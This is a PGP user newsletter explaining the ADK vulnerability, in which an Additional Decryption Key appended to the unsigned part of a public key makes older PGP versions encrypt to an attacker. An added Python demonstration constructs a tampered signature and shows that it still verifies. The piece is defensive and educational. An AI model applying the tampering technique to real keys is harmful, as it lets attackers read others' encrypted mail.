JSaraske's PGP Newsletter #6


Welcome to Newsletter #6. Sorry, I've been busy and have not been able to issue a PGP Newsletter for a while. Several things have happened in the world of PGP. First, a bug was discovered in all 6.x.x versions of PGP up to and including 6.5.3 (and I think at least some 5.x.x versions, but I'm not sure here). Second, NAI/PGP Inc released patches for 6.5.3 and several other versions of PGP to fix the bug. Third, NAI/PGP Inc released PGP 6.5.8, which includes a fix for the bug. And finally, NAI/PGP Inc released PGP 7.0, which includes not only the bug fix but several interesting new features. I'll have to cover the new features in the next newsletter. For now, we'll deal with the bug.

The bug is a vulnerability in the sending (encrypting) copy of PGP, which can be tricked into encrypting to an unauthorized ADK, or Additional Decryption Key. Specifically, PGP will accept an ADK subpacket that has been appended outside the signed area of a public key, that is, in the unhashed part of the key's self-signature, which the signature does not cover. At the time the updated versions of PGP were released, no actual exploitation of the bug in the wild had been reported. For all practical purposes, the vulnerability is a concern for keys received from a public key server. To exploit this bug, an attacker downloads someone's public key from a keyserver, appends an ADK decryptable by a private key the attacker owns, and uploads the modified key back to the server. You can't modify the contents within the hash-checked area without PGP detecting the change and refusing to use the key. But the bug is that PGP will accept an additional key following the hash-checked area, and because that area is not covered by the signature, the key's own self-signature still verifies after the change.
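The following is an added example, not code from this newsletter or from NAI/PGP. It builds a constructed v4 OpenPGP self-signature in Python, appends an ADK subpacket (type 10) to its unhashed area the way the attack does, and shows two things the paragraph above describes: the digest the self-signature commits to is unchanged, so the key still verifies, and a client that honors the unhashed area (PGP before 6.5.8) now encrypts to the attacker's key while a client that ignores it does not. The sample key bytes, the fingerprint, and the ADK subpacket body layout (class octet, algorithm, 20-byte fingerprint) are assumptions made for illustration; the subpacket length encoding and hash trailer follow RFC 4880.

```python
"""Constructed demonstration of the ADK subpacket-placement bug.
Not PGP's code. Sample key/fingerprint bytes and the ADK body layout
are assumptions; subpacket framing and the v4 hash trailer follow RFC 4880."""
import hashlib
import struct

# RFC 4880 signature subpacket types. Type 10 was PGP's Additional
# Decryption Key subpacket; RFC 4880 keeps the number only as a placeholder.
SUBPKT_CREATION_TIME = 2
SUBPKT_ADK = 10
SUBPKT_ISSUER = 16
SUBPKT_KEY_FLAGS = 27


def subpacket(ptype, body):
    """Encode one subpacket using the one-octet length form (bodies under 191 bytes)."""
    length = len(body) + 1            # the type octet is counted in the length
    assert length < 192, "one-octet length form only"
    return bytes([length, ptype]) + body


def parse_subpackets(area):
    """Decode a subpacket area into a list of (type, body) pairs."""
    out, i = [], 0
    while i < len(area):
        first = area[i]
        if first < 192:
            length, i = first, i + 1
        elif first < 255:
            length, i = ((first - 192) << 8) + area[i + 1] + 192, i + 2
        else:
            length, i = struct.unpack(">I", area[i + 1:i + 5])[0], i + 5
        if length == 0 or i + length > len(area):
            raise ValueError("malformed subpacket length")
        out.append((area[i], bytes(area[i + 1:i + length])))
        i += length
    return out


def build_v4_signature(hashed_area, unhashed_area):
    """Assemble a v4 signature packet body (RFC 4880 5.2.3) around two areas.
    The hash-left octets and the MPI are placeholders: no real key is involved."""
    return (bytes([4, 0x13, 1, 2])                # version, positive cert, RSA, SHA-1
            + struct.pack(">H", len(hashed_area)) + hashed_area
            + struct.pack(">H", len(unhashed_area)) + unhashed_area
            + b"\x00\x00"                         # left 16 bits of the hash (placeholder)
            + b"\x00\x01\x01")                    # signature MPI (placeholder)


def split_v4_signature(sig):
    """Return (hashed_subpackets, unhashed_subpackets, signed_prefix)."""
    if sig[0] != 4:
        raise ValueError("only v4 signatures carry subpacket areas")
    hlen = struct.unpack(">H", sig[4:6])[0]
    p = 6 + hlen
    ulen = struct.unpack(">H", sig[p:p + 2])[0]
    hashed = parse_subpackets(sig[6:p])
    unhashed = parse_subpackets(sig[p + 2:p + 2 + ulen])
    return hashed, unhashed, sig[:p]


def append_unhashed_subpacket(sig, ptype, body):
    """What the attacker does: grow the unhashed area, touch nothing else."""
    hlen = struct.unpack(">H", sig[4:6])[0]
    p = 6 + hlen
    ulen = struct.unpack(">H", sig[p:p + 2])[0]
    end = p + 2 + ulen
    new_area = sig[p + 2:end] + subpacket(ptype, body)
    return sig[:p] + struct.pack(">H", len(new_area)) + new_area + sig[end:]


def signed_digest(sig, key_material):
    """The data a v4 self-signature commits to (RFC 4880 5.2.4): the key, the
    signature body through the hashed subpackets, then 0x04 0xFF and the
    length of that hashed span. The unhashed area is simply not in here."""
    _, _, prefix = split_v4_signature(sig)
    trailer = b"\x04\xff" + struct.pack(">I", len(prefix))
    return hashlib.sha1(key_material + prefix + trailer).digest()


def effective_adks(sig, honor_unhashed_area):
    """ADK bodies a client would encrypt to. honor_unhashed_area=True models
    the vulnerable behavior; False models the fix (ADKs must be signed)."""
    hashed, unhashed, _ = split_v4_signature(sig)
    found = [body for t, body in hashed if t == SUBPKT_ADK]
    if honor_unhashed_area:
        found += [body for t, body in unhashed if t == SUBPKT_ADK]
    return found


# --- constructed sample data; no real key is involved ---
KEY_MATERIAL = b"\x99\x00\x05\x04\x39\xa2\x4d\x40"          # stand-in public key packet
ORIGINAL_SIG = build_v4_signature(
    subpacket(SUBPKT_CREATION_TIME, struct.pack(">I", 967_000_000))
    + subpacket(SUBPKT_KEY_FLAGS, b"\x03"),
    subpacket(SUBPKT_ISSUER, bytes.fromhex("0123456789abcdef")),
)
# Assumed ADK body layout: class octet, public-key algorithm, 20-byte fingerprint.
ATTACKER_ADK = b"\x80\x01" + bytes.fromhex("ff" * 20)
TAMPERED_SIG = append_unhashed_subpacket(ORIGINAL_SIG, SUBPKT_ADK, ATTACKER_ADK)

if __name__ == "__main__":
    same = signed_digest(ORIGINAL_SIG, KEY_MATERIAL) == signed_digest(TAMPERED_SIG, KEY_MATERIAL)
    print("self-signature digest unchanged after tampering:", same)
    print("vulnerable client encrypts to:", [a.hex() for a in effective_adks(TAMPERED_SIG, True)])
    print("fixed client encrypts to:", [a.hex() for a in effective_adks(TAMPERED_SIG, False)])
```

The practical check this models is the same one the fix applies: an ADK is only honored when it sits inside the hashed area the key owner actually signed. A keyring audit that parses self-signatures this way can flag any key whose ADK subpackets appear only in the unhashed area.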

So, if you do not exchange keys by means of a public keyserver, you are not at high risk. But it is still possible to receive a tampered public key if someone e-mails you a third party's key or passes it to you on a diskette after downloading it from a public server. Be careful about accepting any key from a third party. At the very least, after adding the key to your public keyring, look at the key in PGPkeys. Make sure ADK is checked in the View menu of PGPkeys. Then, if you see a red LED icon in a key's ADK field, you will know that the key encrypts to a secondary key. ADKs may be legitimate on keys for corporate e-mail accounts; keys for home e-mail accounts generally should not have ADKs.

I recommend all readers obtain PGP 6.5.8 or later -- either the freeware version or one of the commercial versions (Personal Privacy or Desktop Security). The freeware version can be downloaded at no charge from the PGP International web site.

Until next newsletter.....

-------------------- Jim Saraske --------------------



This site created by PC Possibilities (TM)
Copyright © 1999,2000 -- All rights reserved